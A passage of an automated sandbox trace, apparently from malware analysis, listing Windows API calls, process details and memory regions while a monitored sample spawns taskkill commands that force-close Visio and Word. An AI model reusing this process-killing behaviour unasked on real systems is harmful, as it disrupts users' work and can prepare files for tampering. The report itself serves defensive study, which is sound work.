(_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0226.371] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0226.371] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0226.371] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0226.371] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0226.371] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0226.371] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0226.371] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0226.371] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0226.371] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0226.371] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0226.371] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0226.371] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0226.371] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0226.371] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0226.371] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0226.371] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0226.371] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0226.371] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0226.372] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0226.372] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0226.372] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0226.372] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0226.372] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0226.372] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0226.372] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0226.372] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0226.372] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0226.372] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0226.372] GetProcessHeap () returned 0x590000 [0226.372] RtlFreeHeap (HeapHandle=0x590000, Flags=0x0, BaseAddress=0x597618) returned 1 [0226.372] GetProcessHeap () returned 0x590000 [0226.372] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xa) returned 0x59b210 [0226.372] lstrcmpW (lpString1="\\taskkill.exe", lpString2="\\XCOPY.EXE") returned -1 [0226.375] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\taskkill.exe", lpCommandLine="taskkill /f /im visio.exe ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpStartupInfo=0x19f6b0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="taskkill /f /im visio.exe ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19f6fc | out: lpCommandLine="taskkill /f /im visio.exe ", lpProcessInformation=0x19f6fc*(hProcess=0x9c, hThread=0x98, dwProcessId=0x304, dwThreadId=0x54c)) returned 1 [0226.395] CloseHandle (hObject=0x98) returned 1 [0226.395] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0226.395] GetProcessHeap () returned 0x590000 [0226.396] RtlFreeHeap (HeapHandle=0x590000, Flags=0x0, BaseAddress=0x599e48) returned 1 [0226.396] GetEnvironmentStringsW () returned 0x599e48* [0226.396] GetProcessHeap () returned 0x590000 [0226.396] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xa76) returned 0x59bd48 [0226.396] FreeEnvironmentStringsA (penv="=") returned 1 [0226.396] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0xffffffff) returned 0x0 [0227.359] GetExitCodeProcess (in: hProcess=0x9c, lpExitCode=0x19f694 | out: lpExitCode=0x19f694*=0x80) returned 1 [0227.359] CloseHandle (hObject=0x9c) returned 1 [0227.360] _vsnwprintf (in: _Buffer=0x19f77c, _BufferCount=0x13, _Format="%08X", _ArgList=0x19f69c | out: _Buffer="00000080") returned 8 [0227.360] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000080") returned 1 [0227.360] GetProcessHeap () returned 0x590000 [0227.361] RtlFreeHeap (HeapHandle=0x590000, Flags=0x0, BaseAddress=0x59bd48) returned 1 [0227.364] GetEnvironmentStringsW () returned 0x59b260* [0227.364] GetProcessHeap () returned 0x590000 [0227.364] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xa9c) returned 0x59bd08 [0227.365] FreeEnvironmentStringsA (penv="=") returned 1 [0227.365] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0227.365] GetProcessHeap () returned 0x590000 [0227.365] RtlFreeHeap (HeapHandle=0x590000, Flags=0x0, BaseAddress=0x59bd08) returned 1 [0227.365] GetEnvironmentStringsW () returned 0x59b260* [0227.365] GetProcessHeap () returned 0x590000 [0227.365] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xa9c) returned 0x59bd08 [0227.366] FreeEnvironmentStringsA (penv="=") returned 1 [0227.366] GetProcessHeap () returned 0x590000 [0227.366] RtlFreeHeap (HeapHandle=0x590000, Flags=0x0, BaseAddress=0x59b210) returned 1 [0227.366] DeleteProcThreadAttributeList (in: lpAttributeList=0x19f728 | out: lpAttributeList=0x19f728) [0227.366] _get_osfhandle (_FileHandle=1) returned 0x158 [0227.366] SetConsoleMode (hConsoleHandle=0x158, dwMode=0x0) returned 0 [0227.366] _get_osfhandle (_FileHandle=1) returned 0x158 [0227.366] GetConsoleMode (in: hConsoleHandle=0x158, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0227.366] _get_osfhandle (_FileHandle=0) returned 0x154 [0227.366] GetConsoleMode (in: hConsoleHandle=0x154, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0227.366] GetConsoleOutputCP () returned 0x1b5 [0227.367] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0227.367] SetThreadUILanguage (LangId=0x0) returned 0x409 [0227.367] exit (_Code=128) Thread: id = 407 os_tid = 0x12d0 Process: id = "82" image_name = "taskkill.exe" filename = "c:\\windows\\syswow64\\taskkill.exe" page_root = "0x2d3e9000" os_pid = "0x304" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "81" os_parent_pid = "0x4e4" cmd_line = "taskkill /f /im visio.exe " cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5792 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5793 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 5794 start_va = 0x40000 end_va = 0x43fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 5795 start_va = 0x50000 end_va = 0x65fff monitored = 0 entry_point = 0x5de80 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\SysWOW64\\taskkill.exe" (normalized: "c:\\windows\\syswow64\\taskkill.exe") Region: id = 5796 start_va = 0x70000 end_va = 0x406ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 5797 start_va = 0x4070000 end_va = 0x4084fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004070000" filename = "" Region: id = 5798 start_va = 0x4090000 end_va = 0x40cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004090000" filename = "" Region: id = 5799 start_va = 0x40d0000 end_va = 0x410ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040d0000" filename = "" Region: id = 5800 start_va = 0x4110000 end_va = 0x4110fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004110000" filename = "" Region: id = 5801 start_va = 0x4120000 end_va = 0x4121fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 5802 start_va = 0x4200000 end_va = 0x43fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004200000" filename = "" Region: id = 5803 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 5804 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 5805 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5806 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 5807 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 5808 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5809 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 5810 start_va = 0x4180000 end_va = 0x418ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004180000" filename = "" Region: id = 5811 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 5812 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 5813 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5814 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 5815 start_va = 0x4400000 end_va = 0x45fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 5816 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5817 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 5818 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5819 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 5820 start_va = 0x4400000 end_va = 0x44bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5821 start_va = 0x4500000 end_va = 0x45fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004500000" filename = "" Region: id = 5822 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5823 start_va = 0x74650000 end_va = 0x746cafff monitored = 0 entry_point = 0x7466e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 5824 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5825 start_va = 0x4130000 end_va = 0x416ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004130000" filename = "" Region: id = 5826 start_va = 0x4190000 end_va = 0x41cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004190000" filename = "" Region: id = 5827 start_va = 0x76ae0000 end_va = 0x76b23fff monitored = 0 entry_point = 0x76af9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 5828 start_va = 0x75260000 end_va = 0x7530cfff monitored = 0 entry_point = 0x75274f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 5829 start_va = 0x74450000 end_va = 0x7446dfff monitored = 0 entry_point = 0x7445b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 5830 start_va = 0x74440000 end_va = 0x74449fff monitored = 0 entry_point = 0x74442a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 5831 start_va = 0x74590000 end_va = 0x745e7fff monitored = 0 entry_point = 0x745d25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 5832 start_va = 0x77450000 end_va = 0x77596fff monitored = 0 entry_point = 0x77461cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 5833 start_va = 0x76b30000 end_va = 0x76c7efff monitored = 0 entry_point = 0x76be6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 5834 start_va = 0x6cda0000 end_va = 0x6cda7fff monitored = 0 entry_point = 0x6cda17b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 5835 start_va = 0x753c0000 end_va = 0x75451fff monitored = 0 entry_point = 0x753f8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 5836 start_va = 0x77290000 end_va = 0x7744cfff monitored = 0 entry_point = 0x77372a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 5837 start_va = 0x75310000 end_va = 0x7536efff monitored = 0 entry_point = 0x75314af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 5838 start_va = 0x77240000 end_va = 0x77284fff monitored = 0 entry_point = 0x7725de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 5839 start_va = 0x6cd80000 end_va = 0x6cd95fff monitored = 0 entry_point = 0x6cd821d0 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 5840 start_va = 0x6ccb0000 end_va = 0x6cceefff monitored = 0 entry_point = 0x6ccc46c0 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 5841 start_va = 0x6c9a0000 end_va = 0x6cadefff monitored = 0 entry_point = 0x6c9cd880 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 5842 start_va = 0x6cd60000 end_va = 0x6cd7bfff monitored = 0 entry_point = 0x6cd64720 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 5843 start_va = 0x6cd50000 end_va = 0x6cd59fff monitored = 0 entry_point = 0x6cd528d0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 5844 start_va = 0x4600000 end_va = 0x471ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004600000" filename = "" Region: id = 5845 start_va = 0x41d0000 end_va = 0x41f9fff monitored = 0 entry_point = 0x41d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 5846 start_va = 0x4720000 end_va = 0x48a7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004720000" filename = "" Region: id = 5847 start_va = 0x74ea0000 end_va = 0x74ecafff monitored = 0 entry_point = 0x74ea5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 5848 start_va = 0x48b0000 end_va = 0x4a30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000048b0000" filename = "" Region: id = 5849 start_va = 0x4a40000 end_va = 0x5e3ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004a40000" filename = "" Region: id = 5850 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 5851 start_va = 0x4170000 end_va = 0x4170fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004170000" filename = "" Region: id = 5852 start_va = 0x41d0000 end_va = 0x41d4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "taskkill.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\taskkill.exe.mui") Region: id = 5853 start_va = 0x41e0000 end_va = 0x41e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 5854 start_va = 0x41f0000 end_va = 0x41f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041f0000" filename = "" Region: id = 5855 start_va = 0x5e40000 end_va = 0x6176fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 5856 start_va = 0x4600000 end_va = 0x46e9fff monitored = 0 entry_point = 0x463d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 5857 start_va = 0x4710000 end_va = 0x471ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004710000" filename = "" Region: id = 5858 start_va = 0x44c0000 end_va = 0x44c3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044c0000" filename = "" Region: id = 5859 start_va = 0x4600000 end_va = 0x46dffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 5860 start_va = 0x76e20000 end_va = 0x76e2bfff monitored = 0 entry_point = 0x76e23930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 5861 start_va = 0x44d0000 end_va = 0x44d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044d0000" filename = "" Region: id = 5862 start_va = 0x76c80000 end_va = 0x76d03fff monitored = 0 entry_point = 0x76ca6220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 5863 start_va = 0x44e0000 end_va = 0x44e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044e0000" filename = "" Region: id = 5864 start_va = 0x6cca0000 end_va = 0x6ccacfff monitored = 0 entry_point = 0x6cca3520 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 5865 start_va = 0x6cc30000 end_va = 0x6cc96fff monitored = 0 entry_point = 0x6cc4b610 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 5866 start_va = 0x740f0000 end_va = 0x7410afff monitored = 0 entry_point = 0x740f9050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 5867 start_va = 0x6cbe0000 end_va = 0x6cc23fff monitored = 0 entry_point = 0x6cbfaaf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 5868 start_va = 0x6180000 end_va = 0x61bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006180000" filename = "" Region: id = 5869 start_va = 0x61c0000 end_va = 0x61fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000061c0000" filename = "" Region: id = 5870 start_va = 0x6200000 end_va = 0x623ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006200000" filename = "" Region: id = 5871 start_va = 0x6240000 end_va = 0x627ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006240000" filename = "" Region: id = 5872 start_va = 0x6280000 end_va = 0x62bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006280000" filename = "" Region: id = 5873 start_va = 0x62c0000 end_va = 0x62fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000062c0000" filename = "" Region: id = 5874 start_va = 0x6cbc0000 end_va = 0x6cbd0fff monitored = 0 entry_point = 0x6cbc8fa0 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 5875 start_va = 0x6c8e0000 end_va = 0x6c99efff monitored = 0 entry_point = 0x6c911e80 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 5877 start_va = 0x44f0000 end_va = 0x44f5fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Thread: id = 408 os_tid = 0x54c Thread: id = 409 os_tid = 0x1150 Thread: id = 410 os_tid = 0x1194 Thread: id = 411 os_tid = 0x55c Thread: id = 412 os_tid = 0x500 Process: id = "83" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x2d1c8000" os_pid = "0x514" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x110c" cmd_line = "cmd.exe /c \"taskkill /f /im winword.exe \"" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5879 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5880 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 5881 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 5882 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 5883 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 5884 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 5885 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 5886 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 5887 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 5888 start_va = 0xf10000 end_va = 0xf61fff monitored = 1 entry_point = 0xf24fd0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 5889 start_va = 0xf70000 end_va = 0x4f6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f70000" filename = "" Region: id = 5890 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 5891 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 5892 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5893 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 5894 start_va = 